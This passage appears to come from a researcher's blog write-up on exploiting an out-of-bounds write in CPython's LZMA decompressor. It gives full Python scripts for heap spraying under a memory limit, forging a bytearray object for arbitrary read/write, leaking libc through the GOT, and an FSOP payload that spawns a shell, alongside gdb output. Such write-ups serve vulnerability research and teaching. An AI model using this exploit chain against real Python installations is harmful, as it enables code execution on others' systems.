[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1025[1m[38;5;240m ────[0m
 [1m[38;5;240m  1020[0m	[1m[38;5;240m         else if (avail_now < len) {[0m
 [1m[38;5;240m  1021[0m	[1m[38;5;240m             memmove(d->input_buffer, lzs->next_in,[0m
 [1m[38;5;240m  1022[0m	[1m[38;5;240m                     lzs->avail_in);[0m
 [1m[38;5;240m  1023[0m	[1m[38;5;240m             lzs->next_in = d->input_buffer;[0m
 [1m[38;5;240m  1024[0m	[1m[38;5;240m         }[0m
                 // [33mdata[39m=0x00007fffffff9ea0  →  [...]  →  [33m"AAAAAAAAAAAAAAAA"[39m, [33mlzs[39m=0x00007fffffff9ec0  →  [...]  →  0xff1422255f124a10
[32m → 1025[39m	[32m         memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);[39m
   1026	         lzs->avail_in += len;
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;

We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!

Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off because the fact that a large buffer should be landing in the glibc heap instead is part of why the next few sections are so messy. Regardless, we cringe on.

Going Places

Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Feotus has hella alt names), all being some variation on D.* Yellow Swans. Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans… “Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.

Anyways, let’s try to upgrade our primitive.

Finer Memory Control

Right now, our memory exhaustion is being triggered by, well, dumb luck. We have just enough memory that we only have a failed malloc at the specific block we want, and this quickly becomes extremely unreliable once you as much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.

We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something sort of but not exactly ? but maybe it actually is heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few which ideally should be adjacent

import resource
import lzma

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        # sprayyyy
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
# these should be side by side?
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.

953...
954    if (lzret == LZMA_STREAM_END) {
955        FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956        break;
957    } else if (lzs->avail_out == 0) {
958        /* Need to check lzs->avail_out before lzs->avail_in.
959            Maybe lzs's internal state still have a few bytes
960            can be output, grow the output buffer and continue
961            if max_lengh < 0. */
962        if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963            break;
964        }
965        if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966            goto error;
967        }
968...

If lzs->avail_out is set to 0x0, we will exit decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero. So that means we can get decompress_buf to reliably prematurely exit, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:

import resource
import lzma
import os

import ctypes

def heap_addr(b: bytearray) -> int:
    buf = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(buf)

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
    print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)

I’m cheating a little bit here with the ctypes crap for debugging purposes. This is because by creating bytearrays, I’m creating a PyByteArrayObject that would sit in the pyheap, whereas the actual memory which contains the data (and more importantly, where the OOB write would occur) is instead in the glibc heap and an entry in the struct. So when calling id, you get the object’s address (the actually mutable crap) and the byte data sits elsewhere (somehow, this is relevant later).

Running this script, we now see that we can get structs that are kissing (the gap between the addresses is 2kB):

[1m[32mgef➤  [0mr ../../test4.py
Starting program: [32m~/cpython/build-debug/python[39m ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "[32m/usr/lib/libthread_db.so.1[39m".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
[1m[32mgef➤  [0mx/20gx 0x555556aba230-0x80
[34m0x555556aba1b0[39m:	0x0008808011910100	0xfb67c4b18c5a88ba
[34m0x555556aba1c0[39m:	0x5a59040000000002	0xfdfdfdfdfdfdfd00
[34m0x555556aba1d0[39m:	0xfdfdfdfdfdfdfdfd	0xddddddddddddddfd
[34m0x555556aba1e0[39m:	0xdddddddddddddddd	0x0000000000000921
[34m0x555556aba1f0[39m:	0xf108000000000000	0xfdfdfdfdfdfdfd72
[34m0x555556aba200[39m:	0xd908000000000000	0xfdfdfdfdfdfdfd6f
[34m0x555556aba210[39m:	0x0000000000000001	0x0000555555d3f060
[34m0x555556aba220[39m:	0x00000000000008b8	0xffffffffffffffff
[34m0x555556aba230[39m:	0x0000000000000000	0x0000000000000000
[34m0x555556aba240[39m:	0x0000000000000000	0x0000000000000000

Ok, two things:

This OOB write in its current state is not very useful. We are now overflowing into another allocated data carrying region, not the PyByteArrayObject that would actually be relevant. Even if we corrupt the chunk headers, it would probably be really difficult to expand this into something useful, especially with a garbage collector in the way. It’s basically impossible to land our LZMA buffer in the pyheap while also fulfilling the memory exhaustion criteria, so we need to be more creative with our overwrite.
What the fuck is up with the fd and dd bytes? I didn’t put those there.

The Punishment for Using a Debug Build

Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:

When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on 
Python memory allocators to detect memory errors.

The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).

The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().

These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns. 
Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE). 
Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE). 
Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.

The purpose of this padding is so that developers can more easily catch these OOB bugs since writing over the forbidden bytes and so on will certainly trigger a crash. This is actually incredibly useful and an amazing feature.

However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.

Actually Getting Arb R/W

Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…

When allocating a large array, the backing array (i.e. the actual region of memory which contains the relevant pointers to the objects in the array) are thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make an array element point to a fake PyObject…

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) 
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

payload = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
    + b'A'*(2048-32+10)
)

c = bytearray(
        payload
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.

[Thread debugging using libthread_db enabled]
Using host libthread_db library "[32m/usr/lib/libthread_db.so.1[39m".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
[1m[38;5;240m────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[1m[32mgef➤  [0mx/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
[34m0x7ffff75b67f0[39m:	0x0000000000000001	0x0000555555c35fa0
[34m0x7ffff75b6800[39m:	0x000000000000080b	0x000000000000080b
[34m0x7ffff75b6810[39m:	0x0000555556b023b0	0x0000555556b023b0 <-- this is the backing array address
[34m0x7ffff75b6820[39m:	0x0000000000000000	0x0000555556b02390
[1m[32mgef➤  [0mx/20gx 0x0000555556b023b0
[34m0x555556b023b0[39m:	0x0400005a587a37fd	0x0000000046b4d6e6 <-- our LZMA data is here 
[34m0x555556b023c0[39m:	0x7df3b61f2144df1c	0x5a59040000000001
[34m0x555556b023d0[39m:	0x4141414141414164	0x4141414141414141
[34m0x555556b023e0[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b023f0[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02400[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02410[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02420[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02430[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02440[39m:	0x4141414141414141	0x4141414141414141
[1m[32mgef➤  [0mx/8gx 0x7ffff779f500 <-- this is the arrayobject of d
[34m0x7ffff779f500[39m:	0x0000000000000001	0x0000555555c47900
[34m0x7ffff779f510[39m:	0x0000000000000105	0x0000555556b02bd0 <-- this is the backing array address
[34m0x7ffff779f520[39m:	0x0000000000000105	0x00000000006e6f6d
[34m0x7ffff779f530[39m:	0x00007ffff779f431	0x00007ffff779f770
[1m[32mgef➤  [0mx/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
[34m0x555556b02b90[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02ba0[39m:	0x4141414141414141	0x4141414141414141
[34m0x555556b02bb0[39m:	0x4141414141414141	0x0000000000414141
[34m0x555556b02bc0[39m:	0x0000000000000000	0x0000000000000831
[34m0x555556b02bd0[39m:	0x0000555555c7e860	0x0000555555c7e880
[34m0x555556b02be0[39m:	0x0000555555c7e8a0	0x0000555555c7e8c0
[34m0x555556b02bf0[39m:	0x0000555555c7e8e0	0x0000555555c7e900
[34m0x555556b02c00[39m:	0x0000555555c7e920	0x0000555555c7e940
[34m0x555556b02c10[39m:	0x0000555555c7e960	0x0000555555c7e980
[34m0x555556b02c20[39m:	0x0000555555c7e9a0	0x0000555555c7e9c0
[1m[32mgef➤  [0m

Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.

Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughless, and stupidly unreliable (even adding a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).

So let’s get the following:

Our fake struct in the heap that we can get the heap address of, done by making a large byte object (not a bytearray)
A PIE leak (trivially done by leaking id(int) and calculating the offset)

Our script now looks like this:

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

faker = (
    b'd\x00\x00\x00\x00\x00\x00\x00'     # ob_refcnt (non-zero)
    + struct.pack("<q", id(bytearray))     # ob_type
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_size
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_alloc
    + struct.pack("<q", id(int)-0x6f4680)  # ob_bytes (buffer pointer, we do PIE base)
    + struct.pack("<q", id(int)-0x6f4680)  # ob_start (just keep it the same)
    + b'\x00\x00\x00\x00\x00\x00\x00\x00'  # ob_exports
    + b'A'*2048 # padding to fall into glibc heap
)

lzma_buffer = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
    + b'A'*(2048-32+10)
)

c = bytearray(
        lzma_buffer
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}")
    print(f"Next thing at {hex(id(d))}")
    print(f'Fake struct at {hex(id(faker))}')
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
    b'\x00'*6 # padding between our kissing objects
    + struct.pack("<q", 0x0)
    + struct.pack("<q", 0x831) # do not fuck the glibc header
    + struct.pack("<q", id(faker)+0x20), # address of our fake struct, +0x20 to account for the header
1)

input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")

print(d[0][:256])

If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!

➜  build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')

Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.

# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])

libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))

elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00

p64 = lambda x: struct.pack('<Q', x)
input("pause...")

fsop = b''.join([
    b"  sh\x00\x00\x00\x00",            # 0x00: flags
    p64(0),                             # 0x08: _IO_read_ptr
    p64(0),                             # 0x10: _IO_read_end
    p64(0),                             # 0x18: _IO_read_base
    p64(0),                             # 0x20: _IO_write_base
    p64(1),                             # 0x28: _IO_write_ptr
    p64(0) * 7,                         # 0x30 - 0x60: write_end, buf_base... to markers
    p64(system),                   # 0x68: chain
    p64(0) * 3,                         # 0x70 - 0x80: fileno, old_offset, cur_column
    p64(stderr + 0x210),            # 0x88: _lock (needs to point to writable nulls)
    p64(0),                             # 0x90: _offset
    p64(stderr),                   # 0x98: _codecvt
    p64(stderr - 0x48),            # 0xa0: _wide_data
    p64(0) * 6,                         # 0xa8 - 0xd0: freeres, pad, mode, unused
    p64(wfile_jumps)               # 0xd8: vtable
])

print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop

And we get a shell :)


Fig: Winner winner chicken dinner

Conclusion

Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).

So what did I learn from this?

The Python debug build padding thing.
How to throttle Python script resources.
That’s about it actually the rest of the pwn stuff was not complex nor novel to me.

Hopefully, you at least found this entertaining. Okay, ciao.